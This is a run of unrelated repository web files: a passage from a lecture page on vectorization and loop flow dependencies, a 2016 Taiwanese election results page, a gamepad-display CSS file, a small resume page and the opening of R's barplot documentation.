style="font-size: 80%;">Different OpenMP styles of parallelism</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs063.html#___sec62" style="font-size: 80%;">General code structure</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs064.html#___sec63" style="font-size: 80%;">Parallel region</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs065.html#___sec64" style="font-size: 80%;">Hello world, not again, please!</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs066.html#___sec65" style="font-size: 80%;">Hello world, yet another variant</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs067.html#___sec66" style="font-size: 80%;">Important OpenMP library routines</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs068.html#___sec67" style="font-size: 80%;">Private variables</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs069.html#___sec68" style="font-size: 80%;">Master region</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs070.html#___sec69" style="font-size: 80%;">Parallel for loop</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs071.html#___sec70" style="font-size: 80%;">Parallel computations and loops</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs072.html#___sec71" style="font-size: 80%;">Scheduling of loop computations</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs073.html#___sec72" style="font-size: 80%;">Example code for loop scheduling</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs074.html#___sec73" style="font-size: 80%;">Example code for loop scheduling, guided instead of dynamic</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs075.html#___sec74" style="font-size: 80%;">More on Parallel for loop</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs076.html#___sec75" style="font-size: 80%;">What can happen with this loop?</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs077.html#___sec76" style="font-size: 80%;">Inner product</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs078.html#___sec77" style="font-size: 80%;">Different threads do different tasks</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs079.html#___sec78" style="font-size: 80%;">Single execution</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs080.html#___sec79" style="font-size: 80%;">Coordination and synchronization</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs081.html#___sec80" style="font-size: 80%;">Data scope</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs082.html#___sec81" style="font-size: 80%;">Some remarks</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs083.html#___sec82" style="font-size: 80%;">Parallelizing nested for-loops</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs084.html#___sec83" style="font-size: 80%;">Nested parallelism</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs085.html#___sec84" style="font-size: 80%;">Parallel tasks</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs086.html#___sec85" style="font-size: 80%;">Common mistakes</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs087.html#___sec86" style="font-size: 80%;">Not all computations are simple</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs088.html#___sec87" style="font-size: 80%;">Not all computations are simple, competing threads</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs089.html#___sec88" style="font-size: 80%;">How to find the max value using OpenMP</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs090.html#___sec89" style="font-size: 80%;">Then deal with the race conditions</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs091.html#___sec90" style="font-size: 80%;">What can slow down OpenMP performance?</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs092.html#___sec91" style="font-size: 80%;">What can slow down OpenMP performance?</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs093.html#___sec92" style="font-size: 80%;">Find the max location for each thread</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs094.html#___sec93" style="font-size: 80%;">Combine the values from each thread</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs095.html#___sec94" style="font-size: 80%;">"Matrix-matrix multiplication":"https://github.com/CompPhysics/ComputationalPhysicsMSU/blob/master/doc/Programs/ParallelizationOpenMP/OpenMPvectornorm.cpp"</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs096.html#___sec95" style="font-size: 80%;">"Matrix-matrix multiplication":"https://github.com/CompPhysics/ComputationalPhysicsMSU/blob/master/doc/Programs/ParallelizationOpenMP/OpenMPmatrixmatrixmult.cpp"</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs097.html#___sec96" style="font-size: 80%;">What is Message Passing Interface (MPI)?</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs098.html#___sec97" style="font-size: 80%;">Going Parallel with MPI</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs099.html#___sec98" style="font-size: 80%;">MPI is a library</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs100.html#___sec99" style="font-size: 80%;">Bindings to MPI routines</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs101.html#___sec100" style="font-size: 80%;">Communicator</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs102.html#___sec101" style="font-size: 80%;">Some of the most important MPI functions</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs103.html#___sec102" style="font-size: 80%;">"The first MPI C/C++ program":"https://github.com/CompPhysics/ComputationalPhysics2/blob/gh-pages/doc/Programs/LecturePrograms/programs/MPI/chapter07/program2.cpp"</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs104.html#___sec103" style="font-size: 80%;">The Fortran program</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs105.html#___sec104" style="font-size: 80%;">Note 1</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs106.html#___sec105" style="font-size: 80%;">"Ordered output with MPIBarrier":"https://github.com/CompPhysics/ComputationalPhysics2/blob/gh-pages/doc/Programs/LecturePrograms/programs/MPI/chapter07/program3.cpp"</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs107.html#___sec106" style="font-size: 80%;">Note 2</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs108.html#___sec107" style="font-size: 80%;">"Ordered output":"https://github.com/CompPhysics/ComputationalPhysics2/blob/gh-pages/doc/Programs/LecturePrograms/programs/MPI/chapter07/program4.cpp"</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs109.html#___sec108" style="font-size: 80%;">Note 3</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs110.html#___sec109" style="font-size: 80%;">Note 4</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs111.html#___sec110" style="font-size: 80%;">"Numerical integration in parallel":"https://github.com/CompPhysics/ComputationalPhysics2/blob/gh-pages/doc/Programs/LecturePrograms/programs/MPI/chapter07/program6.cpp"</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs112.html#___sec111" style="font-size: 80%;">Dissection of trapezoidal rule with \( MPI\_reduce \)</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs113.html#___sec112" style="font-size: 80%;">Dissection of trapezoidal rule</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs114.html#___sec113" style="font-size: 80%;">Integrating with <b>MPI</b></a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs115.html#___sec114" style="font-size: 80%;">How do I use \( MPI\_reduce \)?</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs116.html#___sec115" style="font-size: 80%;">More on \( MPI\_Reduce \)</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs117.html#___sec116" style="font-size: 80%;">Dissection of trapezoidal rule</a></li> <!-- navigation toc: --> <li><a href="._codeoptimization-bs118.html#___sec117" style="font-size: 80%;">Dissection of trapezoidal rule</a></li> </ul> </li> </ul> </div> </div> </div> <!-- end of navigation bar --> <div class="container"> <p>&nbsp;</p><p>&nbsp;</p><p>&nbsp;</p> <!-- add vertical space --> <a name="part0023"></a> <!-- !split --> <h2 id="___sec22" class="anchor">Automatic vectorization and vectorization inhibitors, data dependencies </h2> <p> One has to keep in mind that vectorization changes the order of operations inside a loop. A so-called read-after-write statement with an explicit flow dependency cannot be vectorized. The following code <p> <!-- code=c++ (!bc cppcod) typeset with pygments style "default" --> <div class="highlight" style="background: #f8f8f8"><pre style="line-height: 125%"><span></span> <span style="color: #B00040">double</span> b <span style="color: #666666">=</span> <span style="color: #666666">15.</span>; <span style="color: #008000; font-weight: bold">for</span> (<span style="color: #B00040">int</span> i <span style="color: #666666">=</span> <span style="color: #666666">1</span>; i <span style="color: #666666">&lt;</span> n; i<span style="color: #666666">++</span>) { a[i] <span style="color: #666666">=</span> a[i<span style="color: #666666">-1</span>] <span style="color: #666666">+</span> b; } </pre></div> <p> is an example of flow dependency and results in wrong numerical results if vectorized. For a scalar operation, the value \( a[i-1] \) computed during the iteration is loaded into the right-hand side and the results are fine. In vector mode however, with a vector length of four, the values \( a[0] \), \( a[1] \), \( a[2] \) and \( a[3] \) from the previous loop will be loaded into the right-hand side and produce wrong results. That is, we have <p> <!-- code=c++ (!bc cppcod) typeset with pygments style "default" --> <div class="highlight" style="background: #f8f8f8"><pre style="line-height: 125%"><span></span> a[<span style="color: #666666">1</span>] <span style="color: #666666">=</span> a[<span style="color: #666666">0</span>] <span style="color: #666666">+</span> b; a[<span style="color: #666666">2</span>] <span style="color: #666666">=</span> a[<span style="color: #666666">1</span>] <span style="color: #666666">+</span> b; a[<span style="color: #666666">3</span>] <span style="color: #666666">=</span> a[<span style="color: #666666">2</span>] <span style="color: #666666">+</span> b; a[<span style="color: #666666">4</span>] <span style="color: #666666">=</span> a[<span style="color: #666666">3</span>] <span style="color: #666666">+</span> b; </pre></div> <p> and if the two first iterations are executed at the same by the SIMD instruction, the value of say \( a[1] \) could be used by the second iteration before it has been calculated by the first iteration, leading thereby to wrong results. <p> <p> <!-- navigation buttons at the bottom of the page --> <ul class="pagination"> <li><a href="._codeoptimization-bs022.html">&laquo;</a></li> <li><a href="._codeoptimization-bs000.html">1</a></li> <li><a href="">...</a></li> <li><a href="._codeoptimization-bs015.html">16</a></li> <li><a href="._codeoptimization-bs016.html">17</a></li> <li><a href="._codeoptimization-bs017.html">18</a></li> <li><a href="._codeoptimization-bs018.html">19</a></li> <li><a href="._codeoptimization-bs019.html">20</a></li> <li><a href="._codeoptimization-bs020.html">21</a></li> <li><a href="._codeoptimization-bs021.html">22</a></li> <li><a href="._codeoptimization-bs022.html">23</a></li> <li class="active"><a href="._codeoptimization-bs023.html">24</a></li> <li><a href="._codeoptimization-bs024.html">25</a></li> <li><a href="._codeoptimization-bs025.html">26</a></li> <li><a href="._codeoptimization-bs026.html">27</a></li> <li><a href="._codeoptimization-bs027.html">28</a></li> <li><a href="._codeoptimization-bs028.html">29</a></li> <li><a href="._codeoptimization-bs029.html">30</a></li> <li><a href="._codeoptimization-bs030.html">31</a></li> <li><a href="._codeoptimization-bs031.html">32</a></li> <li><a href="._codeoptimization-bs032.html">33</a></li> <li><a href="">...</a></li> <li><a href="._codeoptimization-bs118.html">119</a></li> <li><a href="._codeoptimization-bs024.html">&raquo;</a></li> </ul> <!-- ------------------- end of main content --------------- --> </div> <!-- end container --> <!-- include javascript, jQuery *first* --> <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script src="https://netdna.bootstrapcdn.com/bootstrap/3.0.0/js/bootstrap.min.js"></script> <!-- Bootstrap footer <footer> <a href="http://..."><img width="250" align=right src="http://..."></a> </footer> --> <center style="font-size:80%"> <!-- copyright only on the titlepage --> </center> </body> </html>
data/president/n600000700000000/20160116105124/page.html
gugod/vote-watch-2016
<!DOCTYPE html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <meta http-equiv="Expires" content="-1"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Cache-Control" content="no-cache"> <title>105年第十四任總統副總統及第九屆立法委員選舉</title> <link href="../css/style.css" rel="stylesheet" type="text/css"> <link href="../css/style2.css" rel="stylesheet" type="text/css"> <script type="text/javascript" src="../js/ftiens4.js"></script> <script type="text/javascript" src="../js/ua.js"></script> <script type="text/javascript" src="../js/func.js"></script> <script type="text/javascript" src="../js/treeP1.js"></script> <script type="text/javascript" src="../js/refresh.js"></script> </head> <body id="main-body"> <div id="main-header"> <div id="main-top"> <a class="main-top-logo" href="#">中央選舉委員會</a> <ul class="main-top-list"> <li class="main-top-item"><a class="main-top-link main-top-link-home" href="../index.html">回首頁</a></li> <li class="main-top-item"><a class="main-top-link main-top-link-cec" href="http://2016.cec.gov.tw">中選會網站</a></li> <li class="main-top-item"><a class="main-top-link main-top-link-english" href="../../en/index.html">English</a></li> </ul> </div> </div> <div id="main-wrap"> <div id="main-banner"> <div class="slideshow"> <img src="../img/main_bg_1.jpg" width="1024" height="300" alt="background" title="background"> </div> <div class="main-deco"></div> <div class="main-title"></div> <a class="main-pvpe main-pvpe-current" href="../IDX/indexP1.html">總統副總統選舉</a> <a class="main-le" href="../IDX/indexT.html">立法委員選舉</a> </div> <div id="main-container"> <div id="main-content"> <table width="1024" border="1" cellpadding="0" cellspacing="0"> <tr> <td width="180" valign="top"> <div id="divMenu"> <table border="0"> <tr> <td><a style="text-decoration:none;color:silver" href="http://www.treemenu.net/" target=_blank></a></td> </tr> </table> <span class="TreeviewSpanArea"> <script>initializeDocument()</script> <noscript>請開啟Javascript功能</noscript> </span> </div> </td> <td width="796" valign="top"> <div id="divContent"> <!-- 修改區塊 --> <table width="100%" border="0" cellpadding="0" cellspacing="4"> <tr> <td><img src="../images/search.png" alt="候選人得票數" title="候選人得票數">&nbsp;<b>總統副總統選舉&nbsp;候選人在 高雄市 旗山區得票數&nbsp;</b></td> </tr> <tr valign="bottom"> <td> <table width="100%" border="0" cellpadding="0" cellspacing="0"> <tr valign="bottom"> <td class="fontNumber">&nbsp;<img src="../images/nav.gif" alt="候選組數" title="候選組數">&nbsp;<img src="../images/nav.gif" alt="候選組數" title="候選組數">&nbsp;候選組數:3&nbsp;&nbsp;<img src="../images/nav.gif" alt="應選組數" title="應選組數">&nbsp;<img src="../images/nav.gif" alt="應選組數" title="應選組數">&nbsp;應選組數:1</td> <td align="right"> <select name="selector_order" class="selectC" tabindex="1" id="orderBy" onChange="changeOrder();"> <option value="n">依號次排序</option> <option value="s">依得票排序</option> </select> </td> </tr> </table> </td> </tr> <tr valign="top"> <td> <table width="100%" border="0" cellpadding="6" cellspacing="1" class="tableT"> <tr class="trHeaderT"> <td>註記</td> <td>號次</td> <td><table><tr><td>總統</td><td rowspan=2> 候選人姓名</td></tr><td>副總統</td></table></td> <td>性別</td> <td>得票數</td> <td>得票率%</td> <td>登記方式</td> </tr> <tr class="trT"> <td>&nbsp;</td> <td>1</td> <td>朱立倫<br>王如玄</td> <td>男<br>女</td> <td class="tdAlignRight">3,084</td> <td class="tdAlignRight">23.7413</td> <td>中國國民黨&nbsp; 推薦</td> </tr> <tr class="trT"> <td>&nbsp;</td> <td>2</td> <td>蔡英文<br>陳建仁</td> <td>女<br>男</td> <td class="tdAlignRight">8,553</td> <td class="tdAlignRight">65.8430</td> <td>民主進步黨&nbsp; 推薦</td> </tr> <tr class="trT"> <td>&nbsp;</td> <td>3</td> <td>宋楚瑜<br>徐欣瑩</td> <td>男<br>女</td> <td class="tdAlignRight">1,353</td> <td class="tdAlignRight">10.4157</td> <td>親民黨&nbsp; 推薦</td> </tr> <tr class="trFooterT"> <td colspan="7" align="right">投開票所數 已送/應送:&nbsp;24/35&nbsp;</td> </tr> </table> </td> </tr> <tr valign="top"> <td> <table width="100%" border="0" cellpadding="0" cellspacing="0"> <tr> <td width="10"></td> <td valign="top" class="fontNote"> <table> <tr> <td>註記說明:</td> <td align="center">◎</td> <td>自然當選</td> </tr> <tr> <td></td> <td align="center">?</td> <td>同票待抽籤</td> </tr> </table> </td> <td valign="top" class="fontTimer"><img src="../images/clock2.png" alt="Sat, 16 Jan 2016 18:51:11 +0800" title="Sat, 16 Jan 2016 18:51:11 +0800">&nbsp;資料更新時間:&nbsp;01/16&nbsp;18:51:06&nbsp;<br>(網頁每3分鐘自動更新一次)</td> </tr> <tr> <td colspan="3" class="fontNote"></td> </tr> </table> </td> </tr> </table> <!-- 修改區塊 --> </div> </td> </tr> </table> </div> <div class="main-footer"></div> <div id="divFooter" align=center>[中央選舉委員會] </div> <!--main-content--> </div><!--main-container--> </div><!--END main-wrap--> <script>setOrder();</script> <script>setMenuScrollPosY();</script> </body> </html>
ParagliderJavascript/src/Gamepad/Gamepad.css
brueesch/paraglider
@import 'https://fonts.googleapis.com/css?family=Roboto:200,400,500'; @import url(http://fonts.googleapis.com/css?family=Oswald); body { -webkit-font-smoothing: antialiased; margin: 0; padding: 0; background: url(images/bg.png); } /* Header. */ h1 { margin: 0; padding: 0; margin-top: 50px; font-weight: 500; font-size: 48px; font-family: Oswald, Arial; text-align: center; } h2 { margin: 0; padding: 0; margin-top: 20px; font-weight: 200; font-size: 36px; font-family: Oswald, Arial; text-align: center; } #menu label { padding-left: 5px; padding-right: 10px; } a { color: inherit; } /* Error messages. */ #start-to-continue, #no-gamepads-connected, #no-gamepad-support { font-family: Oswald, Arial; font-size: 36px; line-height: 48px; font-weight: 200; text-align: center; padding: 100px 50px; display: none; } #start-to-continue.visible{ display: inline; } #no-gamepad-support.visible { display: block; } #no-gamepads-connected.visible { display: block; } /* Gamepad display. */ #gamepads { margin: 0; margin-top: 50px; padding: 0; list-style: none; white-space: nowrap; text-align: center; } #gamepads > li { width: 940px; height: 720px; margin-left: -30px; position: relative; z-index: 102; display: inline-block; white-space: normal; } #gamepads > li.template { display: none; } #gamepads > li::after { content: ''; width: 100%; height: 100%; position: absolute; left: 0; top: 0; z-index: 200; background: url(images/gamepad-body.png); background-size: 730px 499px; background-position: 120px 40px; background-repeat: no-repeat; } #gamepads > li > .index { position: absolute; left: 437px; top: 300px; width: 100px; font-weight: 500; z-index: 500; text-shadow: 0 -1px 2px rgba(0, 0, 0, .5); font-family: Oswald, Arial; font-size: 40px; color: rgb(120, 120, 120); } #gamepads > li > .name { position: absolute; left: 385px; right: 352px; top: 154px; height: 30px; line-height: 30px; z-index: 500; font-family: Oswald, Arial; font-size: 13px; font-weight: bold; color: rgb(224, 224, 224); text-shadow: 0 0 1px rgb(192, 192, 192); text-align: center; } /* Buttons. */ #gamepads > li > .buttons > ::after { position: absolute; content: ''; border-radius: 100%; background: black; opacity: 0; } #gamepads > li > .buttons > .pressed::after { opacity: .5; } #gamepads > li > .buttons > .top-shoulder { width: 170px; height: 70px; z-index: 200; position: absolute; background-size: 164px 60px; background-repeat: no-repeat; background-position: 50%; background-image: url(images/shoulder-top.png); } #gamepads > li > .buttons > [name='button-left-shoulder-top'] { left: 185px; top: 66px; } #gamepads > li > .buttons > [name='button-right-shoulder-top'] { left: 618px; top: 64px; } #gamepads > li > .buttons > .top-shoulder.pressed { margin-top: 5px; } #gamepads > li > .buttons > .bottom-shoulder { width: 170px; height: 70px; z-index: 150; position: absolute; background-size: 127px 44px; background-repeat: no-repeat; background-position: 50%; background-image: url(images/shoulder-bottom.png); } #gamepads > li > .buttons > [name='button-left-shoulder-bottom'] { left: 185px; top: 46px; } #gamepads > li > .buttons > [name='button-right-shoulder-bottom'] { left: 618px; top: 44px; } #gamepads > li > .buttons > .bottom-shoulder.pressed { margin-top: 5px; } #gamepads > li > .buttons > .face { width: 50px; height: 50px; z-index: 300; position: absolute; background-size: 42px 42px; background-repeat: no-repeat; background-position: 50%; } #gamepads > li > .buttons > .face::after { left: 5px; top: 5px; right: 5px; bottom: 5px; } #gamepads > li > .buttons > [name='button-1'] { left: 676px; top: 241px; background-image: url(images/button-0.png); } #gamepads > li > .buttons > [name='button-2'] { left: 718px; top: 200px; background-image: url(images/button-1.png); } #gamepads > li > .buttons > [name='button-3'] { left: 635px; top: 200px; background-image: url(images/button-2.png); } #gamepads > li > .buttons > [name='button-4'] { left: 677px; top: 158px; background-image: url(images/button-3.png); } #gamepads > li > .buttons > [name='button-dpad-bottom'] { left: 246px; top: 242px; background-image: url(images/button-down.png); } #gamepads > li > .buttons > [name='button-dpad-right'] { left: 286px; top: 201px; background-image: url(images/button-right.png); } #gamepads > li > .buttons > [name='button-dpad-left'] { left: 203px; top: 201px; background-image: url(images/button-left.png); } #gamepads > li > .buttons > [name='button-dpad-top'] { left: 244px; top: 159px; background-image: url(images/button-up.png); } #gamepads > li > .buttons > .select-start { width: 90px; height: 90px; z-index: 300; position: absolute; background-size: 41px 41px; background-repeat: no-repeat; background-position: 50%; background-image: url(images/button-select-start.png); } #gamepads > li > .buttons > .select-start::after { left: 25px; top: 25px; right: 24px; bottom: 25px; } #gamepads > li > .buttons > [name='button-select'] { left: 388px; top: 178px; } #gamepads > li > .buttons > [name='button-start'] { left: 492px; top: 178px; } /* Sticks. */ #gamepads > li > .buttons > .stick { width: 190px; height: 190px; z-index: 300; position: absolute; background-size: 91px 91px; background-repeat: no-repeat; background-position: 50%; background-image: url(images/stick.png); } #gamepads > li > .buttons > .stick::after { left: 54px; top: 54px; right: 54px; bottom: 54px; } #gamepads > li > .buttons > [name='stick-1'] { left: 286px; top: 243px; } #gamepads > li > .buttons > [name='stick-2'] { left: 495px; top: 243px; } /* Labels. */ #gamepads > li > .labels label { z-index: 800; color: black; font-family: Oswald, Arial; font-size: 18px; line-height: 24px; width: 120px; margin-left: -60px; margin-top: 0; display: block; text-align: center; font-weight: normal; position: absolute; opacity: .25; -webkit-transition: opacity 1500ms; -webkit-transition-delay: 500ms; -moz-transition: opacity 1500ms; -moz-transition-delay: 500ms; } #gamepads > li > .labels label::before, #gamepads > li > .labels label::after { font-size: 11px; display: block; font-weight: normal; line-height: 11px; } #gamepads > li > .labels > .extra-inputs > label { position: static; display: inline-block; margin-left: 0; } #gamepads > li > .labels > .extra-inputs > label::before { content: attr(description); } #gamepads > li > .labels > .extra-inputs > label::after { content: attr(access); } #gamepads > li > .labels label.visible { opacity: 1 !important; -webkit-transition: opacity 100ms; -webkit-transition-delay: 0; -moz-transition: opacity 100ms; -moz-transition-delay: 0; } #gamepads > li > .labels label.positive { color: rgb(0, 140, 0); } #gamepads > li > .labels label.negative { color: rgb(200, 0, 0); } #gamepads > li > .labels > label[for="button-1"] { left: 870px; top: 191px; } #gamepads > li > .labels > label[for="button-1"]::before { content: 'Face button 1'; } #gamepads > li > .labels > label[for="button-1"]::after { content: 'buttons[0]'; } #gamepads > li > .labels > label[for="button-2"] { left: 870px; top: 251px; } #gamepads > li > .labels > label[for="button-2"]::before { content: 'Face button 2'; } #gamepads > li > .labels > label[for="button-2"]::after { content: 'buttons[1]'; } #gamepads > li > .labels > label[for="button-3"] { left: 880px; top: 311px; } #gamepads > li > .labels > label[for="button-3"]::before { content: 'Face button 3'; } #gamepads > li > .labels > label[for="button-3"]::after { content: 'buttons[2]'; } #gamepads > li > .labels > label[for="button-4"] { left: 890px; top: 371px; } #gamepads > li > .labels > label[for="button-4"]::before { content: 'Face button 4'; } #gamepads > li > .labels > label[for="button-4"]::after { content: 'buttons[3]'; } #gamepads > li > .labels > label[for="button-dpad-top"] { left: 100px; top: 191px; } #gamepads > li > .labels > label[for="button-dpad-top"]::before { content: 'D-pad top'; } #gamepads > li > .labels > label[for="button-dpad-top"]::after { content: 'buttons[12]'; } #gamepads > li > .labels > label[for="button-dpad-left"] { left: 100px; top: 251px; } #gamepads > li > .labels > label[for="button-dpad-left"]::before { content: 'D-pad left'; } #gamepads > li > .labels > label[for="button-dpad-left"]::after { content: 'buttons[14]'; } #gamepads > li > .labels > label[for="button-dpad-right"] { left: 90px; top: 311px; } #gamepads > li > .labels > label[for="button-dpad-right"]::before { content: 'D-pad right'; } #gamepads > li > .labels > label[for="button-dpad-right"]::after { content: 'buttons[15]'; } #gamepads > li > .labels > label[for="button-dpad-bottom"] { left: 80px; top: 371px; } #gamepads > li > .labels > label[for="button-dpad-bottom"]::before { content: 'D-pad bottom'; } #gamepads > li > .labels > label[for="button-dpad-bottom"]::after { content: 'buttons[13]'; } #gamepads > li > .labels > label[for="button-left-shoulder-top"] { left: 210px; top: 10px; } #gamepads > li > .labels > label[for="button-left-shoulder-top"]::before { content: 'Left top shoulder'; } #gamepads > li > .labels > label[for="button-left-shoulder-top"]::after { content: 'buttons[4]'; } #gamepads > li > .labels > label[for="button-left-shoulder-bottom"] { left: 320px; top: 10px; } #gamepads > li > .labels > label[for="button-left-shoulder-bottom"]::before { content: 'Left bottom shoulder'; } #gamepads > li > .labels > label[for="button-left-shoulder-bottom"]::after { content: 'buttons[6]'; } #gamepads > li > .labels > label[for="button-right-shoulder-top"] { left: 750px; top: 10px; } #gamepads > li > .labels > label[for="button-right-shoulder-top"]::before { content: 'Right top shoulder'; } #gamepads > li > .labels > label[for="button-right-shoulder-top"]::after { content: 'buttons[5]'; } #gamepads > li > .labels > label[for="button-right-shoulder-bottom"] { left: 640px; top: 10px; } #gamepads > li > .labels > label[for="button-right-shoulder-bottom"]::before { content: 'Right bottom shoulder'; } #gamepads > li > .labels > label[for="button-right-shoulder-bottom"]::after { content: 'buttons[7]'; } #gamepads > li > .labels > label[for="button-select"] { left: 440px; top: 60px; } #gamepads > li > .labels > label[for="button-select"]::before { content: 'Select'; } #gamepads > li > .labels > label[for="button-select"]::after { content: 'buttons[8]'; } #gamepads > li > .labels > label[for="button-start"] { left: 540px; top: 60px; } #gamepads > li > .labels > label[for="button-start"]::before { content: 'Start'; } #gamepads > li > .labels > label[for="button-start"]::after { content: 'buttons[9]'; } #gamepads > li > .labels > label[for="stick-1-axis-x"] { left: 380px; top: 441px; } #gamepads > li > .labels > label[for="stick-1-axis-x"]::before { content: 'First stick X'; } #gamepads > li > .labels > label[for="stick-1-axis-x"]::after { content: 'axes[0]'; } #gamepads > li > .labels > label[for="stick-1-axis-y"] { left: 380px; top: 501px; } #gamepads > li > .labels > label[for="stick-1-axis-y"]::before { content: 'First stick Y'; } #gamepads > li > .labels > label[for="stick-1-axis-y"]::after { content: 'axes[1]'; } #gamepads > li > .labels > label[for="stick-1"] { left: 380px; top: 561px; } #gamepads > li > .labels > label[for="stick-1"]::before { content: 'First stick button'; } #gamepads > li > .labels > label[for="stick-1"]::after { content: 'buttons[10]'; } #gamepads > li > .labels > label[for="stick-2-axis-x"] { left: 590px; top: 441px; } #gamepads > li > .labels > label[for="stick-2-axis-x"]::before { content: 'Second stick X'; } #gamepads > li > .labels > label[for="stick-2-axis-x"]::after { content: 'axes[2]'; } #gamepads > li > .labels > label[for="stick-2-axis-y"] { left: 590px; top: 501px; } #gamepads > li > .labels > label[for="stick-2-axis-y"]::before { content: 'Second stick Y'; } #gamepads > li > .labels > label[for="stick-2-axis-y"]::after { content: 'axes[3]'; } #gamepads > li > .labels > label[for="stick-2"] { left: 590px; top: 561px; } #gamepads > li > .labels > label[for="stick-2"]::before { content: 'Second stick button'; } #gamepads > li > .labels > label[for="stick-2"]::after { content: 'buttons[11]'; } /* Raw mode (no visuals). */ #gamepads.raw > li > .labels label { opacity: .5; } #gamepads:not(.raw) > li > .labels > .extra-inputs { position: absolute; left: 0; right: 0; bottom: 0; height: 60px; text-align: center; } #gamepads.raw > li > .name { display: none; } #gamepads.raw > li > .index { position: absolute; left: 0; right: 0; width: auto; top: 0; text-shadow: none; } #gamepads.raw > li::after { display: none; /* Hide gamepad body */ } #gamepads.raw > li > .buttons { display: none; /* Hide buttons */ } #gamepads.raw > li > .labels { margin: 0 50px; margin-top: 100px; } #gamepads.raw > li label { position: static; display: inline-block; margin-left: 0; height: 80px; } #gamepads.raw > li > .labels > .extra-inputs { margin-top: 50px; } /* Iframe mode. */ body.iframe { background: inherit; } body.iframe #menu { width: 100%; position: fixed; } body.iframe #gamepads { padding-top: 60px; margin-top: 0; } body.iframe h1, body.iframe h2 { display: none; } body.iframe #no-gamepads-connected, body.iframe #no-gamepad-support { padding: 400px 50px 0 50px; }
resume/xii.html
harrypujols/desktop
<html> <head> <title>wuzzup.doc</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> </head> <body bgcolor="#FFFFFF"> <center> <p>&nbsp;</p> <p>&nbsp;</p> <p>&nbsp;</p> <p>&nbsp;</p> </center> <center> <a href="end.html"><img src="images/xii.gif" width="230" height="177" border="0" alt="well..."></a> </center> </body> </html>
R-Portable-Win/library/graphics/html/barplot.html
ColumbusCollaboratory/electron-quick-start
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>R: Bar Plots</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link rel="stylesheet" type="text/css" href="R.css" /> </head><body> <table width="100%" summary="page for barplot {graphics}"><tr><td>barplot {graphics}</td><td style="text-align: right;">R Documentation</td></tr></table> <h2>Bar Plots</h2> <h3>Description</h3> <p>Creates a bar plot with vertical or horizontal bars. </p> <h3>Usage</h3> <pre> barplot(height, ...) ## Default S3 method: barplot(height, width = 1, space = NULL, names.arg = NULL, legend.text = NULL, beside = FALSE, horiz = FALSE, density = NULL, angle = 45, col = NULL, border = par("fg"), main = NULL, sub = NULL, xlab = NULL, ylab = NULL, xlim = NULL, ylim = NULL, xpd = TRUE, log = "", axes = TRUE, axisnames = TRUE, cex.axis = par("cex.axis"), cex.names = par("cex.axis"), inside = TRUE, plot = TRUE, axis.lty = 0, offset = 0, add = FALSE, ann = !add &amp;&amp; par("ann"), args.legend = NULL, ...) ## S3 method for class 'formula' barplot(formula, data, subset, na.action, horiz = FALSE, xlab = NULL, ylab = NULL, ...) 